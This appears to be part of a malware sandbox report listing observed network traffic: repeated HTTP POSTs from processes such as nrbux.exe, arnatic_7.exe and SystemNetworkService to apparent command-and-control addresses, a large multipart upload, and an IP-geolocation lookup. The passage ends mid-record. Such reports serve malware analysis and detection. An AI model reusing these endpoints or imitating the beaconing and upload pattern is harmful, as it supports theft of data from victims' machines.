                                                                                                                                                                                        CF-RAY: 668629a54a1afdc1-PDX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:29:33 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b8838e00001bd5ea85e000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=fSlVp74KRjNpk4X7hXO1b8ilkEV20fyIHPhVNT%2FgwxXixsLVUIEopDLHHzCFPkq%2BMe5X5UqOWnlbrXEX6IMmeBYvoF2uTiPqPfEDXCl8vv33XoznikuljEPkAEAnZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668629e5acfc1bd5-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:29:43 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b8abe60000c77189843000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zqq0PJuXEnLEtFnGvRz8eJfWl6E9WZO95NeHgmG8JX%2FdqFObuCjqRY50GEaLE90XuGzwDxPEgCBkkSukAQtHux7e08YUtFyT4mNhrW6TX0gef%2B%2B3eGzYh%2BwUyRLA2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862a263a01c771-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:29:53 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b8d44d0000735fe62d5000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=0Oe%2BpLhUjrD6hdVYK0DDZzqOIPrE4rPwKmHrkCQd4A6jcohz5X3S39URjqMtNmMPbng7x6pdjGAiOachsXGdVxCRqstA3ulpHG07RY9IX6zmFD8K29Te3TW3s2R0Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862a66ee57735f-CPH
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:29:54 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:30:04 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b8fc3f00004bf54e90d000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=KtFbGeoJIgytQ9G5reCwh6NOChc%2F31djXMSdinXRuQ7uGE7lGbSyzlY7%2F6%2F8xdt%2BzOr594jPcVltu9JfNpIHzkKjNzmpl9dL%2FzZB3qFsygoX2DDy85xTzaYUhIdynA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862aa6c9754bf5-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:30:14 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b9248e0000c7719792e000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jQmh40tS9jYqH2YdBmvf5nrVWr3ncVup3NfYPCHc9E8MIFttnebXk3m7tRrvtDSCjN4EFJZ%2F8A6OorwwOpdPaz4MqEUV6KFO9EJhHFfilMWDcd3yLH72GW5Ows6WFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862ae74fb8c771-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:30:25 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b94f1f00007cd615954000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=lpSsp7g4cHmu0SRXYGOWlLN9x1FkgevhiOMN7anrDzx0wXplvuVaKFjjf1sd6TXs5aYOgU%2FxHr3JgCphfxaH6ax%2F%2FlxHkTChvVRgutyhvYIsBkxYu0ZTch9mhAwfAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862b2b6ec47cd6-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:30:35 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b9780c00001e5d8e214000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=XMsGtf0Avug6v02RxqgMHEH6u8s%2B%2BvY5p1VnBKSMTwUzvC0pRzntBCH2qya2AJ8DTBNVHkqq7MOdnzreWzyWNtUm8ytVN%2BmvGE3PAMAoa5AMEXHUQQ%2FgHA51tjou9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862b6ceb351e5d-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:30:45 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b99fd900007cac2a167000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=NcUUm5vhg8JzrygnS%2BWMsk5kfcAxBIze1K71x3ni985kdjb5rJMcBAmUjFF8zxIscj7OQwts5UCeg99oWn8fvtXrNTCtUIfbxeZcVLcs58UpuGuhSSWczU6XvfCteQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862bac88827cac-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:30:55 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----404eba467fa0966a2c841a83dae417b0
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 89462
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://ip-api.com/json/?fields=8198
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        208.95.112.1:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /json/?fields=8198 HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:30:55 GMT
                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                        Content-Length: 59
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        X-Ttl: 1
                                                                                                                                                                                        X-Rl: 37
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 254
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:30:56 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b9c8b400000bf131385000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=OlHABUhX22Wl5BNyDbB6Pm%2BQahQS7NrOFyfJE4dMyyn9VB3J1t0jiN%2FpJUuvFrdwbep%2FdrR6kVG7ENPM5Sd2Ucs3DUhDeTWgmu%2BNBlsozfWCC6HMmqHjlHzvOxCPGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862bedeca40bf1-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
